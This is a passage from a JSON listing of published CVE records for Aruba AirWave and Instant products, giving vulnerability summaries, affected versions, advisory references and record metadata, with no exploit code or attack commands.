          "value": "A remote authenticated sql injection vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. Multiple vulnerabilities in the API of AirWave could allow an authenticated remote attacker to conduct SQL injection attacks against the AirWave instance. An attacker could exploit these vulnerabilities to obtain and modify sensitive information in the underlying database."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "remote authenticated sql injection",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-03-05T16:29:58",
        "orgId": "eb103674-0d28-4225-80f8-39fb86215de0",
        "shortName": "hpe"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-alert@hpe.com",
          "ID": "CVE-2021-26965",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Aruba AirWave Management Platform",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Prior to 8.2.12.0"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A remote authenticated sql injection vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. Multiple vulnerabilities in the API of AirWave could allow an authenticated remote attacker to conduct SQL injection attacks against the AirWave instance. An attacker could exploit these vulnerabilities to obtain and modify sensitive information in the underlying database."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "remote authenticated sql injection"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt",
              "refsource": "MISC",
              "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "eb103674-0d28-4225-80f8-39fb86215de0",
    "assignerShortName": "hpe",
    "cveId": "CVE-2021-26965",
    "datePublished": "2021-03-05T16:29:58",
    "dateReserved": "2021-02-09T00:00:00",
    "dateUpdated": "2024-08-03T20:33:41.414Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2021-29137
Vulnerability from cvelistv5
Published
2021-04-29 11:10
Modified
2024-08-03 22:02
Severity ?
Summary
A remote URL redirection vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability.
Impacted products
Vendor Product Version
n/a Aruba AirWave Management Platform Version: Prior to 8.2.12.1
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T22:02:50.537Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Aruba AirWave Management Platform",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Prior to 8.2.12.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A remote URL redirection vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "remote url redirection",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-04-29T11:10:12",
        "orgId": "eb103674-0d28-4225-80f8-39fb86215de0",
        "shortName": "hpe"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-alert@hpe.com",
          "ID": "CVE-2021-29137",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Aruba AirWave Management Platform",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Prior to 8.2.12.1"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A remote URL redirection vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "remote url redirection"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt",
              "refsource": "MISC",
              "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "eb103674-0d28-4225-80f8-39fb86215de0",
    "assignerShortName": "hpe",
    "cveId": "CVE-2021-29137",
    "datePublished": "2021-04-29T11:10:12",
    "dateReserved": "2021-03-24T00:00:00",
    "dateUpdated": "2024-08-03T22:02:50.537Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2021-26970
Vulnerability from cvelistv5
Published
2021-03-05 16:37
Modified
2024-08-03 20:40
Severity ?
Summary
A remote authenticated arbitrary command execution vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. Vulnerabilities in the AirWave web-base management interface could allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as a lower privileged user on the underlying operating system leading to partial system compromise.
Impacted products
Vendor Product Version
n/a Aruba AirWave Management Platform Version: Prior to 8.2.12.0
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T20:40:47.228Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Aruba AirWave Management Platform",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Prior to 8.2.12.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A remote authenticated arbitrary command execution vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. Vulnerabilities in the AirWave web-base management interface could allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as a lower privileged user on the underlying operating system leading to partial system compromise."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "remote authenticated arbitrary command execution",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-03-05T16:37:10",
        "orgId": "eb103674-0d28-4225-80f8-39fb86215de0",
        "shortName": "hpe"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-alert@hpe.com",
          "ID": "CVE-2021-26970",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Aruba AirWave Management Platform",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Prior to 8.2.12.0"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A remote authenticated arbitrary command execution vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. Vulnerabilities in the AirWave web-base management interface could allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as a lower privileged user on the underlying operating system leading to partial system compromise."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "remote authenticated arbitrary command execution"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt",
              "refsource": "MISC",
              "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "eb103674-0d28-4225-80f8-39fb86215de0",
    "assignerShortName": "hpe",
    "cveId": "CVE-2021-26970",
    "datePublished": "2021-03-05T16:37:10",
    "dateReserved": "2021-02-09T00:00:00",
    "dateUpdated": "2024-08-03T20:40:47.228Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-37917
Vulnerability from cvelistv5
Published
2022-12-08 00:00
Modified
2024-08-03 10:37
Severity ?
Summary
Vulnerabilities in the AirWave Management Platform web-based management interface exist which expose some URLs to a lack of proper access controls. These vulnerabilities could allow a remote attacker with limited privileges to gain access to sensitive information and/or change network configurations with privileges at a higher effective level in Aruba AirWave Management Platform version(s): 8.2.15.0 and below.
Impacted products
Vendor Product Version
n/a Aruba AirWave Management Platform Version: 8.2.15.0 and below
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T10:37:42.462Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2022-019.txt"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Aruba AirWave Management Platform",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "8.2.15.0 and below"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "reporter",
          "user": "00000000-0000-4000-9000-000000000000",
          "value": "Colton Bachman of Aruba Threat Labs"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003eVulnerabilities in the AirWave Management Platform web-based management interface exist which expose some URLs to a lack of proper access controls. These vulnerabilities could allow a remote attacker with limited privileges to gain access to sensitive information and/or change network configurations with privileges at a higher effective level in Aruba AirWave Management Platform version(s): 8.2.15.0 and below.\u003c/p\u003e"
            }
          ],
          "value": "Vulnerabilities in the AirWave Management Platform web-based management interface exist which expose some URLs to a lack of proper access controls. These vulnerabilities could allow a remote attacker with limited privileges to gain access to sensitive information and/or change network configurations with privileges at a higher effective level in Aruba AirWave Management Platform version(s): 8.2.15.0 and below.\n\n"
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "Broken Access Control",
              "lang": "en"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-02-28T18:43:11.066Z",
        "orgId": "eb103674-0d28-4225-80f8-39fb86215de0",
        "shortName": "hpe"
      },
      "references": [
        {
          "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2022-019.txt"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "title": "Broken Access Control for some Web-based Management URLs in AirWave Management Platform",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "eb103674-0d28-4225-80f8-39fb86215de0",
    "assignerShortName": "hpe",
    "cveId": "CVE-2022-37917",
    "datePublished": "2022-12-08T00:00:00",
    "dateReserved": "2022-08-08T00:00:00",
    "dateUpdated": "2024-08-03T10:37:42.462Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2016-2031
Vulnerability from cvelistv5
Published
2020-01-31 19:33
Modified
2024-08-05 23:17
Severity ?
Summary
Multiple vulnerabilities exists in Aruba Instate before 4.1.3.0 and 4.2.3.1 due to insufficient validation of user-supplied input and insufficient checking of parameters, which could allow a malicious user to bypass security restrictions, obtain sensitive information, perform unauthorized actions and execute arbitrary code.
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T23:17:49.388Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/136997/Aruba-Authentication-Bypass-Insecure-Transport-Tons-Of-Issues.html"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://seclists.org/fulldisclosure/2016/May/19"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-004.txt"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.securityfocus.com/bid/90207"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-431802.pdf"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2016-05-04T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Multiple vulnerabilities exists in Aruba Instate before 4.1.3.0 and 4.2.3.1 due to insufficient validation of user-supplied input and insufficient checking of parameters, which could allow a malicious user to bypass security restrictions, obtain sensitive information, perform unauthorized actions and execute arbitrary code."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-11-10T12:06:16",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/136997/Aruba-Authentication-Bypass-Insecure-Transport-Tons-Of-Issues.html"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://seclists.org/fulldisclosure/2016/May/19"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-004.txt"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.securityfocus.com/bid/90207"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-431802.pdf"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2016-2031",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Multiple vulnerabilities exists in Aruba Instate before 4.1.3.0 and 4.2.3.1 due to insufficient validation of user-supplied input and insufficient checking of parameters, which could allow a malicious user to bypass security restrictions, obtain sensitive information, perform unauthorized actions and execute arbitrary code."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://packetstormsecurity.com/files/136997/Aruba-Authentication-Bypass-Insecure-Transport-Tons-Of-Issues.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/136997/Aruba-Authentication-Bypass-Insecure-Transport-Tons-Of-Issues.html"
            },
            {
              "name": "http://seclists.org/fulldisclosure/2016/May/19",
              "refsource": "MISC",
              "url": "http://seclists.org/fulldisclosure/2016/May/19"
            },
            {
              "name": "http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-004.txt",
              "refsource": "MISC",
              "url": "http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-004.txt"
            },
            {
              "name": "https://www.securityfocus.com/bid/90207",
              "refsource": "MISC",
              "url": "https://www.securityfocus.com/bid/90207"
            },
            {
              "name": "https://cert-portal.siemens.com/productcert/pdf/ssa-431802.pdf",
              "refsource": "CONFIRM",
              "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-431802.pdf"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2016-2031",
    "datePublished": "2020-01-31T19:33:12",
    "dateReserved": "2016-01-22T00:00:00",
    "dateUpdated": "2024-08-05T23:17:49.388Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2021-26966
Vulnerability from cvelistv5
Published
2021-03-05 16:10
Modified
2024-08-03 20:33
Severity ?
Summary
A remote authenticated sql injection vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. Multiple vulnerabilities in the API of AirWave could allow an authenticated remote attacker to conduct SQL injection attacks against the AirWave instance. An attacker could exploit these vulnerabilities to obtain and modify sensitive information in the underlying database.
Impacted products
Vendor Product Version
n/a Aruba AirWave Management Platform Version: Prior to 8.2.12.0
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T20:33:41.406Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Aruba AirWave Management Platform",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Prior to 8.2.12.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A remote authenticated sql injection vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. Multiple vulnerabilities in the API of AirWave could allow an authenticated remote attacker to conduct SQL injection attacks against the AirWave instance. An attacker could exploit these vulnerabilities to obtain and modify sensitive information in the underlying database."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "remote authenticated sql injection",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-03-05T16:10:31",
        "orgId": "eb103674-0d28-4225-80f8-39fb86215de0",
        "shortName": "hpe"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-alert@hpe.com",
          "ID": "CVE-2021-26966",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Aruba AirWave Management Platform",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Prior to 8.2.12.0"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A remote authenticated sql injection vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. Multiple vulnerabilities in the API of AirWave could allow an authenticated remote attacker to conduct SQL injection attacks against the AirWave instance. An attacker could exploit these vulnerabilities to obtain and modify sensitive information in the underlying database."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "remote authenticated sql injection"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt",
              "refsource": "MISC",
              "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "eb103674-0d28-4225-80f8-39fb86215de0",
    "assignerShortName": "hpe",
    "cveId": "CVE-2021-26966",
    "datePublished": "2021-03-05T16:10:31",
    "dateReserved": "2021-02-09T00:00:00",
    "dateUpdated": "2024-08-03T20:33:41.406Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2014-8368
Vulnerability from cvelistv5
Published
2014-11-25 15:00
Modified
2024-08-06 13:18
Severity ?
Summary
The web interface in Aruba Networks AirWave before 7.7.14 and 8.x before 8.0.5 allows remote authenticated users to gain privileges and execute arbitrary commands via unspecified vectors.
References
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T13:18:48.166Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.arubanetworks.com/support/alerts/aid-11192014.txt"
          },
          {
            "name": "airwave-cve20148368-priv-esc(98871)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98871"
          },
          {
            "name": "62578",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/62578"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2014-11-19T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The web interface in Aruba Networks AirWave before 7.7.14 and 8.x before 8.0.5 allows remote authenticated users to gain privileges and execute arbitrary commands via unspecified vectors."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-09-07T15:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.arubanetworks.com/support/alerts/aid-11192014.txt"
        },
        {
          "name": "airwave-cve20148368-priv-esc(98871)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98871"
        },
        {
          "name": "62578",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/62578"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2014-8368",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The web interface in Aruba Networks AirWave before 7.7.14 and 8.x before 8.0.5 allows remote authenticated users to gain privileges and execute arbitrary commands via unspecified vectors."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://www.arubanetworks.com/support/alerts/aid-11192014.txt",
              "refsource": "CONFIRM",
              "url": "http://www.arubanetworks.com/support/alerts/aid-11192014.txt"
            },
            {
              "name": "airwave-cve20148368-priv-esc(98871)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98871"
            },
            {
              "name": "62578",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/62578"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2014-8368",
    "datePublished": "2014-11-25T15:00:00",
    "dateReserved": "2014-10-21T00:00:00",
    "dateUpdated": "2024-08-06T13:18:48.166Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2021-26962
Vulnerability from cvelistv5
Published
2021-03-05 15:56
Modified
2024-08-03 20:33
Severity ?
Summary
A remote authenticated arbitrary command execution vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. Vulnerabilities in the AirWave CLI could allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to full system compromise.
Impacted products
Vendor Product Version
n/a Aruba AirWave Management Platform Version: Prior to 8.2.12.0
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T20:33:41.382Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Aruba AirWave Management Platform",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Prior to 8.2.12.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A remote authenticated arbitrary command execution vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. Vulnerabilities in the AirWave CLI could allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to full system compromise."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "remote authenticated arbitrary command execution",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-03-05T15:56:03",
        "orgId": "eb103674-0d28-4225-80f8-39fb86215de0",
        "shortName": "hpe"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-alert@hpe.com",
          "ID": "CVE-2021-26962",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Aruba AirWave Management Platform",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Prior to 8.2.12.0"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A remote authenticated arbitrary command execution vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. Vulnerabilities in the AirWave CLI could allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to full system compromise."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "remote authenticated arbitrary command execution"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt",
              "refsource": "MISC",
              "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "eb103674-0d28-4225-80f8-39fb86215de0",
    "assignerShortName": "hpe",
    "cveId": "CVE-2021-26962",
    "datePublished": "2021-03-05T15:56:03",
    "dateReserved": "2021-02-09T00:00:00",
    "dateUpdated": "2024-08-03T20:33:41.382Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2021-26971
Vulnerability from cvelistv5
Published
2021-03-05 16:43
Modified
2024-08-03 20:40
